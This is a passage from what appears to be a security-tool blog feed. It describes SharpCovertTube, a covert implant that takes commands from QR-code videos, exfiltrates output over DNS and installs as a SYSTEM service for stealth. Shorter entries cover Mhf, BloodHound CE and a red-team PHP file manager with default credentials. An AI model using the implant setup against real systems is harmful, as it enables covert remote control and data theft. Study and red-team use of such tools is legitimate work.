"c:\temp\.sharpcoverttube.log"): Log file path.</li> <li><strong>dns_exfiltration</strong> (Optional. Default: true): Exfiltrate command responses through DNS or not.</li> <li><strong>dns_hostname</strong> (Optional. Default: ".test.org"): DNS hostname to exfiltrate the response from commands executed in the system.</li> </ul> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEj0Gh5wuMqPA80RMaZKIf6-Ld0HbkYjEZ2hp_ogscmXhE69HCc7ttLUcvtYDKLeDPnr0-e0tgjbPaVVrPgjLKt4HOPDqkhbOqD-wB5KHLHCnEM-N3-tsc4byWjrE0Z1ofcmXpcXH6_iChErN018IFKZf1k8cOraHpdKKhm-mpCsRMlRuuw-0BC-QYsOb80"><img alt="" border="0" height="294" id="BLOGGER_PHOTO_ID_7343001728956714658" src="https://blogger.googleusercontent.com/img/a/AVvXsEj0Gh5wuMqPA80RMaZKIf6-Ld0HbkYjEZ2hp_ogscmXhE69HCc7ttLUcvtYDKLeDPnr0-e0tgjbPaVVrPgjLKt4HOPDqkhbOqD-wB5KHLHCnEM-N3-tsc4byWjrE0Z1ofcmXpcXH6_iChErN018IFKZf1k8cOraHpdKKhm-mpCsRMlRuuw-0BC-QYsOb80=w640-h294" width="640" /></a></p> <br /><span style="font-size: large;"><b>Generating videos with QR codes</b></span><br /> <p>You can generate the videos from Windows using Python3. For that, first install the dependencies:</p> <pre><code>pip install Pillow opencv-python pyqrcode pypng <a href="https://www.kitploit.com/search/label/Pycryptodome" target="_blank" title="pycryptodome">pycryptodome</a> rebus<br /></code></pre> <p>Then run the generate_video.py script:</p> <pre><code>python generate_video.py -t TYPE -f FILE -c COMMAND [-k AESKEY] [-i AESIV]<br /></code></pre> <ul> <li> <p>TYPE (-t) must be "qr" for payloads in cleartext or "qr_aes" if using AES encryption.</p> </li> <li> <p>FILE (-f) is the path where the video is generated.</p> </li> <li> <p>COMMAND (-c) is the command to execute in the system.</p> </li> <li> <p>AESKEY (-k) is the key for AES encryption, only necessary if using the type "qr_aes". It must be a string of 16 characters and the same as in Program.cs file in SharpCovertTube.</p> </li> <li> <p>AESIV (-i) is the IV for AES encryption, only necessary if using the type "qr_aes". It must be a string of 16 characters and the same as in Program.cs file in SharpCovertTube. </p> </li> </ul> <br /><b>Examples</b><br /> <p>Generate a video with a QR value of "whoami" in cleartext in the path c:\temp\whoami.avi:</p> <pre><code>python generate_video.py -t qr -f c:\temp\whoami.avi -c whoami<br /></code></pre> <p>Generate a video with an AES-encrypted QR value of "dir c:\windows\temp" with the key and IV "0000000000000000" in the path c:\temp\dirtemp_aes.avi:</p> <pre><code>python generate_video.py -t qr_aes -f c:\temp\dirtemp_aes.avi -c "dir c:\windows\temp" -k 0000000000000000 -i 0000000000000000<br /></code></pre> <p><br /></p> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgLQoLmBbHKnOoHbqon0qBg9FF75GTHmRZVFUGXF9-SUYwHLhK9vtmAoVnOKSkJJT9bVfsMuYtIDIh3b49M7ttt1gzabRpkdUtGg8wiDDRzKeiJ2pBlJuNuhrJgwPRd1T9Pi9Ot2qG6kc7shP20imFZv0MbXvVNQaZD9Q2kVa6a1tUzeO0APatrp5TF3DA"><img alt="" border="0" height="96" id="BLOGGER_PHOTO_ID_7343001729862797778" src="https://blogger.googleusercontent.com/img/a/AVvXsEgLQoLmBbHKnOoHbqon0qBg9FF75GTHmRZVFUGXF9-SUYwHLhK9vtmAoVnOKSkJJT9bVfsMuYtIDIh3b49M7ttt1gzabRpkdUtGg8wiDDRzKeiJ2pBlJuNuhrJgwPRd1T9Pi9Ot2qG6kc7shP20imFZv0MbXvVNQaZD9Q2kVa6a1tUzeO0APatrp5TF3DA=w640-h96" width="640" /></a></p> <br /><span style="font-size: large;"><b>Running it as a service</b></span><br /> <p>You can find the code to run it as a service in the <a href="https://github.com/ricardojoserf/SharpCovertTube/tree/main/SharpCovertTube_Service" rel="nofollow" target="_blank" title="SharpCovertTube_Service folder">SharpCovertTube_Service folder</a>. It has the same functionalities except self-deletion, which would not make sense in this case.</p> <p>It possible to install it with InstallUtil, it is prepared to run as the SYSTEM user and you need to install it as administrator:</p> <pre><code>InstallUtil.exe SharpCovertTube_Service.exe<br /></code></pre> <p>You can then start it with:</p> <pre><code>net start "SharpCovertTube Service"<br /></code></pre> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgYY3U8wgtcwaqaUCDM_9EZ0_xH8ski1gFSOqqM9VWc23i6_27Xb0REqkBF5wgIGnCIURTOqcBIrvQAcKgOO1ZFRFY85B-ADJ7ii3-lc69dxOwRxMFq7iuC1qj5BBNUhaNTr7OuO8ilwboTGBXMZIFNhIrSoGTE2XsCps09x8gNrlZIMUhffFoa7Qkg6G0"><img alt="" border="0" height="162" id="BLOGGER_PHOTO_ID_7343001741526346914" src="https://blogger.googleusercontent.com/img/a/AVvXsEgYY3U8wgtcwaqaUCDM_9EZ0_xH8ski1gFSOqqM9VWc23i6_27Xb0REqkBF5wgIGnCIURTOqcBIrvQAcKgOO1ZFRFY85B-ADJ7ii3-lc69dxOwRxMFq7iuC1qj5BBNUhaNTr7OuO8ilwboTGBXMZIFNhIrSoGTE2XsCps09x8gNrlZIMUhffFoa7Qkg6G0=w640-h162" width="640" /></a></p> <p>In case you have administrative privileges this may be stealthier than the ordinary binary, but the "Description" and "DisplayName" should be updated (as you can see in the image above). If you do not have those privileges you can not install services so you can only use the ordinary binary.</p> <br /><span style="font-size: large;"><b>Notes</b></span><br /> <ul> <li> <p><strong>File must be 64 bits!!!</strong> This is due to the code used for QR decoding, which is borrowed from Stefan Gansevles's <a href="https://github.com/Stefangansevles/QR-Capture" rel="nofollow" target="_blank" title="QR-Capture">QR-Capture</a> project, who borrowed part of it from Uzi Granot's <a href="https://github.com/Uzi-Granot/QRCode" rel="nofollow" target="_blank" title="QRCode">QRCode</a> project, who at the same time borrowed part of it from Zakhar Semenov's <a href="https://github.com/free5lot/Camera_Net" rel="nofollow" target="_blank" title="Camera_Net">Camera_Net</a> project (then I lost track). So thanks to all of them!</p> </li> <li> <p>This project is a port from <a href="https://github.com/ricardojoserf/covert-tube" rel="nofollow" target="_blank" title="covert-tube">covert-tube</a>, a project I developed in 2021 using just Python, which was inspired by Welivesecurity blogs about <a href="https://www.welivesecurity.com/2019/10/03/casbaneiro-trojan-dangerous-cooking/" rel="nofollow" target="_blank" title="Casbaneiro">Casbaneiro</a> and <a href="https://www.welivesecurity.com/2021/09/17/numando-latam-banking-trojan/" rel="nofollow" target="_blank" title="Numando">Numando</a> malwares.</p> </li> </ul><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/ricardojoserf/SharpCovertTube" rel="nofollow" target="_blank" title="Download SharpCovertTube">Download SharpCovertTube</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-8126767107181546632024-03-05T18:35:00.004-03:002024-03-05T18:35:53.872-03:00Mhf - Mobile Helper Framework - A Tool That Automates The Process Of Identifying The Framework/Technology Used To Create A Mobile Application<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEir81ZSiKQIrBc66e-q1MVjO3J9eD2s6sNYbprAhq-JDsVfFBcBKV1WltNnAc5jsGrgM1N17jJbS6IoEokK2KXq-ghPNJujzE4Bji-XgP9rYE6t1Pf_-TevCaKgKeT8cTbKWx0ckyJU2oG4wmGsSbSHpvXodazhdoI84Fkarqu14cohvLVKkmRZ8JhWxUMq/s1773/Mhf.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1014" data-original-width="1773" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEir81ZSiKQIrBc66e-q1MVjO3J9eD2s6sNYbprAhq-JDsVfFBcBKV1WltNnAc5jsGrgM1N17jJbS6IoEokK2KXq-ghPNJujzE4Bji-XgP9rYE6t1Pf_-TevCaKgKeT8cTbKWx0ckyJU2oG4wmGsSbSHpvXodazhdoI84Fkarqu14cohvLVKkmRZ8JhWxUMq/w640-h366/Mhf.png" width="640" /></a></div><p><br /></p><p>Mobile Helper Framework is a tool that automates the process of identifying the framework/technology used to create a mobile application. Additionally, it assists in finding <a href="https://www.kitploit.com/search/label/Sensitive%20Information" target="_blank" title="sensitive information">sensitive information</a> or provides suggestions for working with the identified platform.</p><span><a name='more'></a></span><p><br /></p><span style="font-size: large;"><b>How work?</b></span><br /> <p>The tool searches for files associated with the technologies used in mobile application development, such as configuration files, resource files, and source code files.</p> <br /><span style="font-size: large;"><b>Example</b></span><br /> <br /><b>Cordova</b><br /> <p>Search files:</p> <pre><code>index.html<br />cordova.js<br />cordova_plugins.js<br /></code></pre> <br /><b>React Native Android & iOS</b><br /> <p>Search file</p> <pre><code>Andorid files:<br /><br />libreactnativejni.so<br />index.android.bundle<br /><br />iOS files:<br /><br />main.jsbundle<br /></code></pre> <br /><span style="font-size: large;"><b>Installation</b></span><br /> <p>❗A minimum of Java 8 is required to run Apktool. </p> <p><code>pip install -r requirements.txt</code></p> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <p><code>python3 mhf.py app.apk|ipa|aab</code></p> <br /><b>Examples</b><br /> <pre><code>python3 mobile_helper_framework.py file.apk<br /><br />[+] App was written in React Native<br /><br />Do you want analizy the application (y/n) y<br /><br />Output <a href="https://www.kitploit.com/search/label/Directory" target="_blank" title="directory">directory</a> already exists. Skipping decompilation.<br /><br />Beauty the react code? (y/n) n<br /><br />Search any info? (y/n) y<br /><br />==>>Searching possible internal IPs in the file<br /><br />results.........<br /><br />==>>Searching possible emails in the file<br /><br />results.........<br /><br />==>>Searching possible interesting words in the file<br /><br />results.........<br /><br />==>>Searching Private Keys in the file<br /><br />results.........<br /><br />==>>Searching high confidential secrets<br /><br />results.........<br /><br />==>>Searching possible sensitive URLs in js files<br /><br />results.........<br /><br />==>>Searching possible <a href="https://www.kitploit.com/search/label/Endpoints" target="_blank" title="endpoints">endpoints</a> in js files results.........<br /></code></pre> <br /><span style="font-size: large;"><b>Features</b></span><br /> <p>This tool uses Apktool for decompilation of Android applications.</p> <p>This tool renames the .ipa file of iOS applications to .zip and extracts the contents. </p> <table> <tbody><tr> <th align="center">Feature</th> <th>Note</th> <th align="right">Cordova</th> <th align="right">React Native</th> <th align="right">Native JavaScript</th> <th align="right">Flutter</th> <th align="right">Xamarin</th> </tr> <tr> <td align="center">JavaScript beautifier</td> <td>Use this for the first few occasions to see better results.</td> <td align="right">✅</td> <td align="right">✅</td> <td align="right">✅</td> <td align="right"></td> <td align="right"></td> </tr> <tr> <td align="center">Identifying multiple sensitive information</td> <td>IPs, Private Keys, API Keys, Emails, URLs</td> <td align="right">✅</td> <td align="right">✅</td> <td align="right">✅</td> <td align="right">❌</td> <td align="right"></td> </tr> <tr> <td align="center">Cryptographic Functions</td> <td></td> <td align="right">✅</td> <td align="right">✅</td> <td align="right">✅</td> <td align="right">❌</td> <td align="right">❌</td> </tr> <tr> <td align="center">Endpoint extractor</td> <td></td> <td align="right">✅</td> <td align="right">✅</td> <td align="right">✅</td> <td align="right">❌</td> <td align="right">❌</td> </tr> <tr> <td align="center">Automatically detects if the code has been beautified.</td> <td></td> <td align="right">❌</td> <td align="right">❌</td> <td align="right">❌</td> <td align="right"></td> <td align="right"></td> </tr> <tr> <td align="center">Extracts automatically apk of devices/emulator</td> <td></td> <td align="right">❌</td> <td align="right">❌</td> <td align="right">❌</td> <td align="right">❌</td> <td align="right">❌</td> </tr> <tr> <td align="center">Patching apk</td> <td></td> <td align="right"></td> <td align="right"></td> <td align="right"></td> <td align="right">✅</td> <td align="right"></td> </tr> <tr> <td align="center">Extract an APK from a bundle file.</td> <td></td> <td align="right">✅</td> <td align="right">✅</td> <td align="right">✅</td> <td align="right">✅</td> <td align="right">✅</td> </tr> <tr> <td align="center">Detect if JS files are encrypted</td> <td></td> <td align="right">❌</td> <td align="right"></td> <td align="right">❌</td> <td align="right"></td> <td align="right"></td> </tr> <tr> <td align="center">Detect if the resources are compressed.</td> <td></td> <td align="right">❌</td> <td align="right">Hermes✅</td> <td align="right">❌</td> <td align="right">❌</td> <td align="right">XALZ✅</td> </tr> <tr> <td align="center">Detect if the app is split</td> <td></td> <td align="right">❌</td> <td align="right">❌</td> <td align="right">❌</td> <td align="right">❌</td> <td align="right">❌</td> </tr> </tbody></table> <p><code>What is patching apk:</code> This tool uses Reflutter, a framework that assists with <a href="https://www.kitploit.com/search/label/Reverse%20Engineering" target="_blank" title="reverse engineering">reverse engineering</a> of Flutter apps using a patched version of the Flutter library.</p> <p>More information: https://github.com/Impact-I/reFlutter </p><hr /> <p><code>Split APKs</code> is a technique used by Android to reduce the size of an application and allow users to download and use only the necessary parts of the application.</p> <p>Instead of downloading a complete application in a single APK file, Split APKs divide the application into several smaller APK files, each of which contains only a part of the application such as resources, code libraries, assets, and configuration files.</p> <pre><code>adb shell pm path com.package<br />package:/data/app/com.package-NW8ZbgI5VPzvSZ1NgMa4CQ==/base.apk<br />package:/data/app/com.package-NW8ZbgI5VPzvSZ1NgMa4CQ==/split_config.arm64_v8a.apk<br />package:/data/app/com.package-NW8ZbgI5VPzvSZ1NgMa4CQ==/split_config.en.apk<br />package:/data/app/com.package-NW8ZbgI5VPzvSZ1NgMa4CQ==/split_config.xxhdpi.apk<br /></code></pre> <p>For example, in Flutter if the application is a Split it's necessary patch split_config.arm64_v8a.apk, this file contains libflutter.so </p> <br /><span style="font-size: large;"><b>Credits</b></span><br /> <ul> <li>This tool use a secrets-patterns-db repositorty created by <a href="https://github.com/mazen160/secrets-patterns-db" rel="nofollow" target="_blank" title="mazen160">mazen160</a></li> <li>This tool use a regular expresion created by <a href="https://github.com/mazen160/https://github.com/GerbenJavado/LinkFinder/blob/master/linkfinder.py" rel="nofollow" target="_blank" title="Gerben_Javado">Gerben_Javado</a> for extract endpoints</li> <li>This tools use <a href="https://www.kitploit.com/search/label/reFlutter" target="_blank" title="reflutter">reflutter</a> for flutter actions </li> </ul> <br /><span style="font-size: large;"><b>Changelog</b></span><br /> <br /><b>0.5</b><br /> <ul> <li>Public release</li> <li>Bug fixes</li> </ul> <br /><b>0.4</b><br /> <ul> <li>Added plugins information in Cordova apps</li> <li>Added Xamarin actions</li> <li>Added NativeScript actions</li> <li>Bug fixes</li> </ul> <br /><b>0.3</b><br /> <ul> <li>Added NativeScript app detection</li> <li>Added signing option when the apk extracted of aab file is not signed</li> </ul> <br /><b>0.2</b><br /> <ul> <li>Fixed issues with commands on Linux.</li> </ul> <br /><b>0.1</b><br /> <ul> <li>Initial version release.</li> </ul> <br /><span style="font-size: large;"><b>License</b></span><br /> <ul> <li>This work is licensed under a Creative Commons Attribution 4.0 International License.</li> </ul> <br /><span style="font-size: large;"><b>Autors</b></span><br /> <p><a href="https://twitter.com/__stux" rel="nofollow" target="_blank" title="Cesar Calderon">Cesar Calderon</a> <a href="https://websec.mx/" rel="nofollow" target="_blank" title="Marco Almaguer">Marco Almaguer</a></p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/stuxctf/mhf" rel="nofollow" target="_blank" title="Download Mhf">Download Mhf</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-77861886549037308932024-03-04T08:30:00.001-03:002024-03-04T08:30:00.134-03:00BloodHound - Six Degrees Of Domain Admin<p></p><p></p><p align="center"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjapo5OJmW2ZGdWH6Fut4H-kEifhE9oTnwxqfSjRz7zjVuMwhsOoOJtuqRNmn_cVxcziFJsoEiw8UbrJt-R1bNNx5-jEm4o1ztvvjF5PkfacD2uURmR-mf5o65gM0tkNdvi9aDO72eBJve4nuG-TDUeUWjXCLMC7VWMz8wQTUeUoW0pK3x3F_8YCPpfuzio"><img alt="" border="0" height="548" id="BLOGGER_PHOTO_ID_7338668270705967650" src="https://blogger.googleusercontent.com/img/a/AVvXsEjapo5OJmW2ZGdWH6Fut4H-kEifhE9oTnwxqfSjRz7zjVuMwhsOoOJtuqRNmn_cVxcziFJsoEiw8UbrJt-R1bNNx5-jEm4o1ztvvjF5PkfacD2uURmR-mf5o65gM0tkNdvi9aDO72eBJve4nuG-TDUeUWjXCLMC7VWMz8wQTUeUoW0pK3x3F_8YCPpfuzio=w640-h548" width="640" /></a></p><p align="center"><br /></p> <p>BloodHound is a monolithic web application composed of an embedded React frontend with <a href="https://www.sigmajs.org/" rel="nofollow" target="_blank" title="Sigma.js">Sigma.js</a> and a <a href="https://go.dev/" rel="nofollow" target="_blank" title="Go">Go</a> based REST API backend. It is deployed with a <a href="https://www.postgresql.org/" rel="nofollow" target="_blank" title="Postgresql">Postgresql</a> application database and a <a href="https://neo4j.com/" rel="nofollow" target="_blank" title="Neo4j">Neo4j</a> graph database, and is fed by the <a href="https://github.com/BloodHoundAD/SharpHound" rel="nofollow" target="_blank" title="SharpHound">SharpHound</a> and <a href="https://github.com/BloodHoundAD/AzureHound" rel="nofollow" target="_blank" title="AzureHound">AzureHound</a> data collectors.</p> <p>BloodHound uses <a href="https://www.kitploit.com/search/label/Graph%20Theory" target="_blank" title="graph theory">graph theory</a> to reveal the hidden and often unintended relationships within an <a href="https://www.kitploit.com/search/label/Active%20Directory" target="_blank" title="Active Directory">Active Directory</a> or Azure environment. Attackers can use <a href="https://www.kitploit.com/search/label/BloodHound" target="_blank" title="BloodHound">BloodHound</a> to easily identify highly complex attack paths that would otherwise be impossible to identify quickly. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory or Azure environment.</p> <p>BloodHound CE is created and maintained by the <a href="https://bloodhoundenterprise.io" rel="nofollow" target="_blank" title="BloodHound Enterprise Team">BloodHound Enterprise Team</a>. The original BloodHound was created by <a href="https://www.twitter.com/_wald0" rel="nofollow" target="_blank" title="@_wald0">@_wald0</a>, <a href="https://twitter.com/CptJesus" rel="nofollow" target="_blank" title="@CptJesus">@CptJesus</a>, and <a href="https://twitter.com/harmj0y" rel="nofollow" target="_blank" title="@harmj0y">@harmj0y</a>.</p> <span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Running BloodHound Community Edition</b></span><br /> <p>The easiest way to get up and running is to use our pre-configured Docker Compose setup. The following steps will get BloodHound CE up and running with the least amount of effort.</p> <ol> <li>Install Docker Compose and ensure Docker is running. This should be included with the <a href="https://www.docker.com/products/docker-desktop/" rel="nofollow" target="_blank" title="Docker Desktop">Docker Desktop</a> installation</li> <li>Run <code>curl -L https://ghst.ly/getbhce | docker compose -f - up</code></li> <li>Locate the randomly generated password in the terminal output of Docker Compose</li> <li>In a browser, navigate to <code>http://localhost:8080/ui/login</code>. Login with a username of <code>admin</code> and the randomly generated password from the logs</li> </ol> <p>NOTE: going forward, the default <code>docker-compose.yml</code> example binds only to localhost (127.0.0.1). If you want to access BloodHound outside of localhost, you'll need to follow the instructions in <a href="https://github.com/SpecterOps/examples/docker-compose/README.md" rel="nofollow" target="_blank" title="examples/docker-compose/README.md">examples/docker-compose/README.md</a> to configure the host binding for the container.</p> <br /><span style="font-size: large;"><b>Installation Error Handling</b></span><br /> <ul> <li>If you encounter a "failed to get console mode for stdin: The handle is invalid." ensure Docker Desktop (and associated Engine is running). Docker Desktop does not automatically register as a startup entry. </li> </ul> <p align="center"> <a href="https://blogger.googleusercontent.com/img/a/AVvXsEixBUvpG_6szaiuByEzz3zh7iCMbX8LXKZYHn9tniatuu1NfiBQBZUQ_udqiY1ePjGCsvfGgO-5xx5Y7bP_WfoQhbNhT0IaDRIMZzXiMDYjg-OqXsPasZVUL1reVZ8lshcNjP51LIw6MkyodfjUp9f7wh0w1j7_8Wf2zI_rX4BnaFmYdfTZeo61Ly_Ql7VP"><img alt="" border="0" id="BLOGGER_PHOTO_ID_7338668301600612402" src="https://blogger.googleusercontent.com/img/a/AVvXsEixBUvpG_6szaiuByEzz3zh7iCMbX8LXKZYHn9tniatuu1NfiBQBZUQ_udqiY1ePjGCsvfGgO-5xx5Y7bP_WfoQhbNhT0IaDRIMZzXiMDYjg-OqXsPasZVUL1reVZ8lshcNjP51LIw6MkyodfjUp9f7wh0w1j7_8Wf2zI_rX4BnaFmYdfTZeo61Ly_Ql7VP=s320" /></a> </p> <ul> <li>If you encounter an "Error response from daemon: Ports are not available: exposing port TCP 127.0.0.1:7474 -> 0.0.0.0:0: listen tcp 127.0.0.1:7474: bind: Only one usage of each socket address (protocol/network address/port) is normally permitted." this is normally attributed to the "Neo4J Graph Database - neo4j" service already running on your local system. Please stop or delete the service to continue.</li> </ul> <pre><code># Verify if Docker Engine is Running<br />docker info<br /><br /># Attempt to stop Neo4j Service if running (on Windows)<br />Stop-Service "Neo4j" -ErrorAction SilentlyContinue<br /></code></pre> <ul> <li>A successful installation of BloodHound CE would look like the below:</li> </ul> <p>https://github.com/SpecterOps/BloodHound/assets/12970156/ea9dc042-1866-4ccb-9839-933140cc38b9</p> <br /><span style="font-size: large;"><b>Useful Links</b></span><br /> <ul> <li><a href="https://ghst.ly/BHSlack" rel="nofollow" target="_blank" title="BloodHound Slack">BloodHound Slack</a></li> <li><a href="https://github.com/SpecterOps/BloodHound/wiki" rel="nofollow" target="_blank" title="Wiki">Wiki</a></li> <li><a href="https://github.com/SpecterOps/CONTRIBUTORS.md" rel="nofollow" target="_blank" title="Contributors">Contributors</a></li> <li><a href="https://github.com/SpecterOps/examples/docker-compose/README.md" rel="nofollow" target="_blank" title="Docker Compose Example">Docker Compose Example</a></li> <li><a href="https://support.bloodhoundenterprise.io/" rel="nofollow" target="_blank" title="BloodHound Docs">BloodHound Docs</a></li> <li><a href="https://github.com/SpecterOps/BloodHound/wiki/Development" rel="nofollow" target="_blank" title="Developer Quick Start Guide">Developer Quick Start Guide</a></li> <li><a href="https://github.com/SpecterOps/BloodHound/wiki/Contributing" rel="nofollow" target="_blank" title="Contributing Guide">Contributing Guide</a></li> </ul> <br /><span style="font-size: large;"><b>Contact</b></span><br /> <p>Please check out the <a href="https://github.com/SpecterOps/BloodHound/wiki/Contact" rel="nofollow" target="_blank" title="Contact page">Contact page</a> in our wiki for details on how to reach out with questions and suggestions.</p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/SpecterOps/BloodHound" rel="nofollow" target="_blank" title="Download BloodHound">Download BloodHound</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-54393976504929775122024-03-03T08:30:00.001-03:002024-03-03T08:30:00.143-03:00Tinyfilemanager-Wh1Z-Edition - Effortlessly Browse And Manage Your Files With Ease Using Tiny File Manager [WH1Z-Edition], A Compact Single-File PHP File Manager<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhKijDg7HK2WUMAOdgFR5IkVZrsW_gfvWlKW8-GeGIdiDQ-u-pwTBi0MNdknEqm4sgtPqGVm79dm1n7vsFbDt32tvYJR56vzeBODx87u8E_-cZb2M4ZVtIuXu4ET1pcs8xJbO6oYD0cdhhIX4ghf6FMUHxDPdTGBPEuGvBjSqbXWpaemnH4ilOVqcSITXcm"><img alt="" border="0" height="340" id="BLOGGER_PHOTO_ID_7337937213045492242" src="https://blogger.googleusercontent.com/img/a/AVvXsEhKijDg7HK2WUMAOdgFR5IkVZrsW_gfvWlKW8-GeGIdiDQ-u-pwTBi0MNdknEqm4sgtPqGVm79dm1n7vsFbDt32tvYJR56vzeBODx87u8E_-cZb2M4ZVtIuXu4ET1pcs8xJbO6oYD0cdhhIX4ghf6FMUHxDPdTGBPEuGvBjSqbXWpaemnH4ilOVqcSITXcm=w640-h340" width="640" /></a></p><div><br /></div> <blockquote> <p>Introducing Tiny File Manager [WH1Z-Edition], the compact and efficient solution for managing your files and folders with enhanced privacy and security features. Gone are the days of relying on external resources – I've stripped down the code to its core, making it truly lightweight and perfect for deployment in environments without internet access or outbound connections.</p> <p>Designed for simplicity and speed, Tiny File Manager [WH1Z-Edition] retains all the essential functionalities you need for storing, uploading, editing, and managing your files directly from your web browser. With a single-file PHP setup, you can effortlessly drop it into any folder on your server and start organizing your files immediately.</p> <p>What sets Tiny File Manager [WH1Z-Edition] apart is its focus on privacy and security. By removing the reliance on external domains for CSS and JS resources, your data stays localized and protected from potential <a href="https://www.kitploit.com/search/label/vulnerabilities" target="_blank" title="vulnerabilities">vulnerabilities</a> or leaks. This makes it an ideal choice for scenarios where data integrity and confidentiality are paramount, including RED TEAMING exercises or restricted server environments.</p></blockquote><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Requirements</b></span><br /> <ul> <li>PHP 5.5.0 or higher.</li> <li>Fileinfo, iconv, zip, tar and mbstring extensions are strongly recommended.</li> </ul> <br /><span style="font-size: large;"><b>How to use</b></span><br /> <p>Download ZIP with latest version from master branch.</p> <p>Simply transfer the "tinyfilemanager-wh1z.php" file to your web hosting space – it's as easy as that! Feel free to rename the file to whatever suits your needs best.</p> <p>The <a href="https://www.kitploit.com/search/label/Default%20Credentials" target="_blank" title="default credentials">default credentials</a> are as follows: <strong>admin/WH1Z@1337</strong> and <strong>user/WH1Z123</strong>.</p> <p>:warning: Caution: Before use, it is imperative to establish your own username and password within the <code>$auth_users</code> variable. Passwords are encrypted using <code>password_hash()</code>. </p> <p>ℹ️ You can generate a new password hash accordingly: Login as Admin -> Click Admin -> Help -> Generate new password hash</p> <p>:warning: Caution: Use the built-in password generator for your privacy and security. 😉</p> <p>To enable/disable <a href="https://www.kitploit.com/search/label/Authentication" target="_blank" title="authentication">authentication</a> set <code>$use_auth</code> to true or false.</p> <br /><b>:loudspeaker: Key Features</b><br /> <ul> <li>:cd: Open Source, lightweight, and incredibly user-friendly</li> <li>:iphone: Optimized for mobile devices, ensuring a seamless touch experience</li> <li>:information_source: Core functionalities including file creation, deletion, modification, viewing, downloading, copying, and moving</li> <li>:arrow_double_up: Efficient Ajax Upload functionality, supporting drag & drop, URL uploads, and multiple file uploads with file extension filtering</li> <li>:file_folder: Intuitive options for creating both folders and files</li> <li>:gift: Capability to compress and extract files (<code>zip</code>, <code>tar</code>)</li> <li>:sunglasses: Flexible user permissions system, based on session and user root folder mapping</li> <li>:floppy_disk: Easy copying of direct file URLs for streamlined sharing</li> <li>:pencil2: Integration with Cloud9 IDE, offering syntax highlighting for over <code>150+</code> languages and a selection of <code>35+</code> themes</li> <li>:page_facing_up: Seamless integration with Google/Microsoft doc viewer for previewing various file types such as <code>PDF/DOC/XLS/PPT/etc</code>. Files up to 25 MB can be previewed using the Google Drive viewer</li> <li>:zap: Backup functionality, IP blacklist/whitelist management, and more</li> <li>:mag_right: Powerful search capabilities using <code>datatable js</code> for efficient file filtering</li> <li>:file_folder: Ability to exclude specific folders and files from the listing</li> <li>:globe_with_meridians: Multi-language support (32+ languages) with a built-in translation feature, requiring no additional files</li> <li>:bangbang: And much more...</li> </ul> <br /><b><a name="license" target="_blank" title="Effortlessly browse and manage your files with ease using Tiny File Manager [WH1Z-Edition], a compact single-file PHP file manager. (8)"></a>License, Credit</b><br /> <ul> <li>Available under the <a href="https://github.com/PinoyWH1Z/tinyfilemanager-wh1z-edition/blob/master/LICENSE" rel="nofollow" target="_blank" title="GNU license">GNU license</a></li> <li>Original concept and development by github.com/prasathmani/tinyfilemanager</li> <li>CDN Used - <em>jQuery, Bootstrap, Font Awesome, Highlight js, ace js, DropZone js, and DataTable js</em></li> <li>To report a bug or request a feature, please file an <a href="https://github.com/PinoyWH1Z/tinyfilemanager-wh1z-edition/issues" rel="nofollow" target="_blank" title="issue">issue</a></li> </ul><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/PinoyWH1Z/tinyfilemanager-wh1z-edition" rel="nofollow" target="_blank" title="Download Tinyfilemanager-Wh1Z-Edition">Download Tinyfilemanager-Wh1Z-Edition</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-42295666330003857822024-03-02T22:01:00.002-03:002024-03-02T22:01:27.800-03:00Kali Linux 2024.1 - Penetration Testing and Ethical Hacking Linux Distribution<div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHxmgnPnFWLMi89MxWFqpyXnD9tTAwrUKj90bso-fwtYvqhK8Ho29AjUD7D_SSasRQ_gxYhOS03kx7mAJKGwokwu-P6hmRnyKwCpqR4_dIfq44zid2fuEoOnqBN1_w_gI5IScv6OYIgkvFAvzPCi6ZLNW1L1tMvbBZyiRwKeJXVVkfsodT76cez3tWIc29/s1200/kali-linux-banner-2024.1-release.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="628" data-original-width="1200" height="334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHxmgnPnFWLMi89MxWFqpyXnD9tTAwrUKj90bso-fwtYvqhK8Ho29AjUD7D_SSasRQ_gxYhOS03kx7mAJKGwokwu-P6hmRnyKwCpqR4_dIfq44zid2fuEoOnqBN1_w_gI5IScv6OYIgkvFAvzPCi6ZLNW1L1tMvbBZyiRwKeJXVVkfsodT76cez3tWIc29/w640-h334/kali-linux-banner-2024.1-release.jpg" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div></div><p></p>
